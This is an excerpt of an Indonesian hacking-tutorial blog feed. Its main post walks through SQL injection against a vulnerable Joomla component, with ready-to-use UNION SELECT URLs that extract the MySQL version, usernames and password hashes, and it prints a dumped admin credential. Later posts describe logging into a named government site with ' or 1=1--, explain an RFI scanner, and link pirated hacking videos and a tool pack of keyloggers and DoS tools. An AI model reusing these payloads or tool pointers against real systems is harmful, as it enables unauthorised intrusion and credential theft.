<p>Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini &#8230; </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+union+all+select+1,<br />@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from<br />+wc_users</p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/joomla/title.jpg" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /><br />perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan : </p>
<p>&lt;title&gt;5.0.33 (18)&lt;/title&gt;</p>
<p>Mysql versi 5.0.33 <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> . </p>
<p>Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini : </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+union+all+select+1,<br />username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users</p>
<p>jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut &#8230; </p>
<p>&lt;title&gt;admin (18)&lt;/title&gt;</p>
<p>Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini : </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&#038;version=1&#038;feed_id=1+union+all+select+1,<br />concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,<br />4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users</p>
<p>perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah : </p>
<p>0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini : </p>
<p><img src="http://www.unair.info/ilmuwebsite/hack/joomla/usernamepassword.jpg" border="0" title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" alt="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /><br />admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator</p>
<p>Jika di urutkan : <br />Username : admin<br />Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK<br />Email : alkemail@gmail.com<br />User type : Super Administrator</p>
<p>Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi.  <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> . Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut. </p>
<p>Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya. </p>
<p>Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya &#8230; <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> . </p>
<p>Untuk keperluan eksperimen, silahkan download filenya di sini. <br /><a target="_blank" href="http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip" target="_self">http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip</a><br /><a target="_blank" href="http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz" target="_self">http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz</a></p>
<p>greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya<br />Peterpanz yang kerepotan ngurus skripsi juga <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Implementasi SQL Injection pada Joomla tutorial hacking web desain grafis" /> , mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/implementasi-sql-injection-pada-joomla/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>PHP Security &#8211; Cek Bug PHP Script</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/php-security-cek-bug-php-script</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/php-security-cek-bug-php-script#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:30:28 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Setelah terampungkan script php yang telah kita buat ada  kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah  siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat  dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi  system.     Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://sitepointstatic.com/graphics/phpniteclub2.jpg" border="0" width="210" height="218" align="left" title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" alt="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /><span>Setelah terampungkan script php yang telah kita buat ada  kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah  siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat  dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi  system. </span> <br />    <br /><span>Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah security. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~~~ </span><br /><span id="more-620"></span>    <br /><span>Lalu, bagaimana mencegah sang hacker mengekploitasi,  bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui  script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua  ??  <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> <br />  </span><br /><span>Sebelum kita beralih maju ke langkah selanjutnya ada  baiknya untuk mengenali bug popular yang paling sering diexploitasi.</span> </p>
<p><span>Penulis akan mencoba untuk memberikan sedikit penjelasan,  bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content  Management system maupun yang lainnya. Di antaranya :</span>
<p align="left"><span>- XSS ( Cross Site Scripting )<br /></span><span>- SQL Injection</span> <br /><span>- RFI ( Remote File Inclusion )</span> </p>
<p align="left"><strong><span>Cross Site Scriping </span></strong> <br /><span>Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi  karena tidak adanya filtering pada html maupun java script. </span> <br />  <br /><span>Tetapi pada dasarnya defacing ( perubahan kontent ) hanya  terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat  mencuri cookie  kemudian menggunakannya  untuk berbuat sesuatu yang &#8230; <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~~</span><br />  <br /><span>Contohnya :</span><span style="text-decoration: underline"><br /></span><span>Sensored [ maaf ]</span></p>
<p><strong><span>SQL Injection</span></strong><br /><span>SQL Injection sebenarnya terjadi karena seorang attacker  yang mencoba melakukan inject query sql   melalui form ataupun via address bar pada browser internet.  Sebagai contohnya ketika penulis mencoba login  sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id  ).  Dengan menggunakan query &#8216; or 1=1&#8211;  penulis pun berhasil login. Pada dasarnya &#8216; atau single quote dan or 1=1&#8211; itu  berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh  server sql adalah menjalankan query &#8221; select * &#8220;. Yang terjadi adalah  penulis diloloskan untuk login sebagai admin. </span> <br />    <br /><span>Berikut adalah gambar yang penulis capture ketika penulis  berhasil login sebagai admin pada situs </span><span>http://www.sumsel.go.id</span></p>
<p><span>Gambar ini diambil sebelum penulis mengontak webmaster  via email untuk mempatch script phpnya.</span><br />    <br /><strong><span>RFI ( Remote File Inclusion )</span></strong><br /><span>Sebelumnya silahkan membaca artikel fungsi </span><a href="http://www.ilmuwebsite.com/detil_hacking/16/detil_php_kuliah/4/Membahas_Fungsi_include_-_include_once_-_require/" target="_self">require, require_once, include, dan include_one</a><span> RFI sendiri terjadi karena kesalahan programmer ketika  melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.  Apabila user memasukkan url evil script miliknya pada variable yang digunakan  dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut  dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan  command di server milik anda untuk merubah konten situs atau bahkan merusaknya.  <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~~ </span></p>
<p><span>Untuk contohnya silahkan anda cari di www.milw0rm.com <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~</span> </p>
<p><span>Keywordnya Remote File Inclusion. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~</span> </p>
<p><strong><span>Pengecekan BUG</span></strong><br /><span>Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm  &#8230; tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat  secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara  tidak sengaja maupun sengaja. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~</span> <br />    <br /><span>Pada dasarnya untuk mengecek bug dapat dilakukan secara  online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di  localhost anda ( offline ) saja.</span></p>
<p><strong><span>Cek Bug XSS</span></strong><br /><span>Tools untuk mengecek XSS pada script php milik anda  adalah sebuah addons mozilla firefox yang disediakan secara gratis.  Penginstallannya pun tergolong mudah,</span> <span>berikut juga cara penggunaannya. <br />    <br />Tools tersebut dapat  anda download disini :</span> <br /><a target="_blank" href="http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi" target="_self">http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi</a> </p>
<p><strong><span>Cek Bug SQL Injection</span></strong><br /><span>Untuk periode saat ini defacing dengan SQL Injection  digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena  penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax  sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah  digunakan telah disediakan untuk melakukan cek bug sql injection. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" />  </span> <br />    <br /><span>Anda dapat mendownloadnya disini : </span> <br /><a target="_blank" href="http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi" target="_self">http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi</a></p>
<p><span>Penggunaanya pun tidak terlalu sulit.</span></p>
<p><strong><span>Cek BUG Remote File Inclusion</span></strong><br /><span>Sebelumya anda download terlebih dahulu scriptnya disini </span><a target="_blank" href="http://www.newhack.org/dl_jump.php?id=4" target="_self">http://www.newhack.org/dl_jump.php?id</a><br /><span>Setelah itu silahkan download active perl, compiler  interpreter ini nantinya digunakan untuk menjalankan script  inclusionscanner.pl. </span> <br /><span>Dan kemudian copykan inclusionscanner.pl tersebut ke  direktori c:\perl\bin</span> </p>
<p><span>Langkah selanjutnya :</span></p>
<p><span>1. Masukkan  script  yang akan anda scan kedalam sebuah direktori di c:\perl php.</span> </p>
<p><span>ex : c:\perl\wordpress.</span></p>
<p><span>2. Masuk ke command prompt, start | run | cmd | enter</span> </p>
<p><span>3.  Setelah itu  masuk ke direktory c:\perl\bin, cd c:\perl\bin</span> </p>
<p><span>4. Jalankan scriptnya, </span> </p>
<p><span>C:\Perl\bin&gt;perl.exe inclusionscanner.pl</span></p>
<p><span>#Will check a directory for all includes and unsets</span> </p>
<p><span>#Coded by Ironfist (ironsecurity.nl)</span> </p>
<p><span>#Usage: create a folder in your perlfolder and put the  files to be scanned in it</span> </p>
<p><span>, next type the folder name below (eg myfolder)</span> </p>
<p> <span>#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> </span><br />  <br /><span>Directory to read? c:\perl\wp</span><br />  <br /><span>kemudian lihat hasilnya di c:\perl\bin\result.html</span><br />  <br /><span>berikut hasil scan ketika penulis mencoba untuk melakukan  cek inclusion pada wordpress-2.3.3 :</span><br />    <br />  <span>FOUND: require_once($locale_file);<br />  in c:\perl\wp/wp-settings.php FOUND:  require_once($import_root . &#8216;/&#8217; . $file);<br />  in c:\perl\wp/wp-admin/import.php FOUND:  include_once($this-&gt;PluginDir . &#8220;class-smtp.php&#8221;);<br />  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.&#8217;phpmailer.lang-&#8217;.$lang_type.&#8217;.php&#8217;);<br />  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.&#8217;phpmailer.lang-en.php&#8217;);<br />  in c:\perl\wp/wp-includes/class-phpmailer.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  include($template);<br />  in c:\perl\wp/wp-includes/template-loader.php FOUND:  require_once($_template_file);<br />in c:\perl\wp/wp-includes/theme.php</span></p>
<p><span>woww !!! <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~~ silahkan di exploitasi eh di patch script  milik anda. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="PHP Security   Cek Bug PHP Script tutorial hacking web desain grafis" /> ~~</span> </p>
<p><span>Ingat, jangan merusak, jangan berbuat vandal, jika anda  menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan  beritahu pihak admin.</span><span>greetz to : ilmuwebsite staff, member ilmuwebsite, </span> </p>
<p><span>special for jojo and her baby.</span> </p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/php-security-cek-bug-php-script/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hacking Video &#8211; Career Academy Hacking</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/hacking-video-career-academy-hacking</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/hacking-video-career-academy-hacking#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:27:54 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[[last updated, 08 Juni 2009]Lagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://unair.info/img/hacker.jpg" border="0" width="210" height="158" align="left" title="Hacking Video   Career Academy Hacking tutorial hacking web desain grafis" alt="Hacking Video   Career Academy Hacking tutorial hacking web desain grafis" /><span style="font-weight: bold; color: #ff0000">[last updated, 08 Juni 2009]</span><br />Lagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Hacking Video   Career Academy Hacking tutorial hacking web desain grafis" /> &#8212;- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB. <br />  <span id="more-619"></span><br />  Silahkan bagi yang tertarik untuk mendownloadnya : <br />  <!--c1-->
<div class="codetop" style="font-family: Times New Roman,Times,serif"> </div>
<p>  <!--ec1-->-Training Module 1 Ethical Hacking and Penetration Testing &#8211; cd 1 <br />  -Training Module 2 Footprinting and Reconnaissance &#8211; cd 2 <br />  -Training Module 3 TCP IP Basics and Scanning &#8211; cd 3 <br />  -Training Module 4 Enumeration and Verification &#8211; cd 4 <br />  -Training Module 5 Hacking Defending Wireless Modems &#8211; cd 5<br />  -Training Module 6 Hacking Defending Web Servers &#8211; cd 6 <br />  -Training Module 7 Hacking Defending Web Applications &#8211; cd 7 <br />  -Training Module 8 Sniffers and Session Hijacking &#8211; cd 8 <br />  -Training Module 9 Hacking Defending Windows Systems &#8211; cd 9 <br />  -Training Module 10 Hacking Defending Unix Systems &#8211; cd 10<br />  -Training Module 11 Rootkits Backdoors Trojans Tunnels &#8211; cd 11<br />  -Training Module 12 Denial of Service and Botnets &#8211; cd 12<br />  -Training Module 13 Automated Pen Testing Tools &#8211; cd 13 <br />  -Training Module 14 Intrusion Detection Systems &#8211; cd 14<br />  -Training Module 15 Firewalls &#8211; cd 15<br />  -Training Module 16 Honeypots and Honeynets &#8211; cd 16<br />  -Training Module 17 Ethics and Legal Issues &#8211; cd 17</p>
<p><span style="font-weight: bold">http://rapidshare.com/files/194379379/Gxc.VT.CAHPTaCT_UDS.part01.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194382133/Gxc.VT.CAHPTaCT_UDS.part02.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377149/Gxc.VT.CAHPTaCT_UDS.part03.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377617/Gxc.VT.CAHPTaCT_UDS.part04.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379332/Gxc.VT.CAHPTaCT_UDS.part05.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377712/Gxc.VT.CAHPTaCT_UDS.part06.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377133/Gxc.VT.CAHPTaCT_UDS.part07.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379107/Gxc.VT.CAHPTaCT_UDS.part08.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379430/Gxc.VT.CAHPTaCT_UDS.part09.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377280/Gxc.VT.CAHPTaCT_UDS.part10.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379072/Gxc.VT.CAHPTaCT_UDS.part11.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194380389/Gxc.VT.CAHPTaCT_UDS.part12.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379054/Gxc.VT.CAHPTaCT_UDS.part13.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379376/Gxc.VT.CAHPTaCT_UDS.part14.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377484/Gxc.VT.CAHPTaCT_UDS.part15.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379264/Gxc.VT.CAHPTaCT_UDS.part16.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194380491/Gxc.VT.CAHPTaCT_UDS.part17.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379192/Gxc.VT.CAHPTaCT_UDS.part18.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379700/Gxc.VT.CAHPTaCT_UDS.part19.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377767/Gxc.VT.CAHPTaCT_UDS.part20.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194378937/Gxc.VT.CAHPTaCT_UDS.part21.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194380403/Gxc.VT.CAHPTaCT_UDS.part22.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379344/Gxc.VT.CAHPTaCT_UDS.part23.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377766/Gxc.VT.CAHPTaCT_UDS.part24.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194381936/Gxc.VT.CAHPTaCT_UDS.part25.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379027/Gxc.VT.CAHPTaCT_UDS.part26.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379882/Gxc.VT.CAHPTaCT_UDS.part27.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379279/Gxc.VT.CAHPTaCT_UDS.part28.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194377828/Gxc.VT.CAHPTaCT_UDS.part29.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194379311/Gxc.VT.CAHPTaCT_UDS.part30.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194385532/Gxc.VT.CAHPTaCT_UDS.part31.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194385469/Gxc.VT.CAHPTaCT_UDS.part32.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194383279/Gxc.VT.CAHPTaCT_UDS.part33.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194385282/Gxc.VT.CAHPTaCT_UDS.part34.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194385524/Gxc.VT.CAHPTaCT_UDS.part35.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194385305/Gxc.VT.CAHPTaCT_UDS.part36.rar</span><br /><span style="font-weight: bold"> http://rapidshare.com/files/194381537/Gxc.VT.CAHPTaCT_UDS.sfv</span></p>
<p>mirror  :</p>
<p><span style="font-weight: bold">http://www.megaupload.com/?d=HROI2ZAV</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=242ZNM7E</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=QY14I10X</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=NHOLUTCO</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=Y9BSB284</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=5GCV9UA3</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=J41JSY0G</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=TXKSRAI8</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=DHF8UMKY</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=RLXSOPTK</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=5O0YFY79</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=RLHUHJDS</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=YNVEK8LB</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=RNYWZ64V</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=J42I6OSZ</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=1EC6S73S</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=25CAZSL2</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=0BZ0FPO1</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=JRPO74HU</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=Z6S34VR6</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=TDXJH9JZ</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=GNCSKLL3</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=LYI3SY94</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=8D3E0R6O</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=0022RC7Z</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=ASMBUELW</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=5XMX3AIZ</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=IPWD9NSU</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=DWQ3469B</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=WL91FDR7</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=TISTATGB</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=1OTQAHLA</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=Q2JTKAHH</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=OUNUNGAP</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=K4GMUQYF</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=QJNKWK0H</span><br /><span style="font-weight: bold"> http://www.megaupload.com/?d=HP3D8TLB</span></p>
<p>mirror 2 </p>
<p><span style="font-weight: bold">http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d2abc972a2ae368c4b</span></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/hacking-video-career-academy-hacking/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CD Hacking Tools 2007 &#8211; Gratis</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/cd-hacking-tools-2007-gratis</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/cd-hacking-tools-2007-gratis#comments</comments>
		<pubDate>Thu, 11 Jun 2009 10:23:39 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[CD Hacking Tools ( Mirror was Updated ) XxxPass-Team 2007Danger Cracking &#038; Hacking Tools &#8211; Ver 1.0 - Exploit Collection (4 Tools)- Google Hacking (4 Tools)- Keyloggers (5 Tools)- Binder &#038; Packer (15 Tools)- Flood_DOS (20 Tools)- Messenger (11 Tools)- Bruter (9 Tools)- Anonimity (1 Tool)- !!! $$$ !!! (13 Tools)- AIO Exploit Collection 1. [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://3.bp.blogspot.com/_a3h9Yb37iJk/R7-wt7_q7sI/AAAAAAAAAAM/25tw_GC2Mrk/s320/2j28gm1.jpg" border="0" width="210" height="158" align="left" title="CD Hacking Tools 2007   Gratis tutorial hacking web desain grafis" alt="CD Hacking Tools 2007   Gratis tutorial hacking web desain grafis" /><span style="font-weight: bold">CD Hacking Tools</span><span style="color: #000000"> ( Mirror was Updated )</span></p>
<p>XxxPass-Team 2007<br />Danger Cracking &#038; Hacking Tools &#8211; Ver 1.0</p>
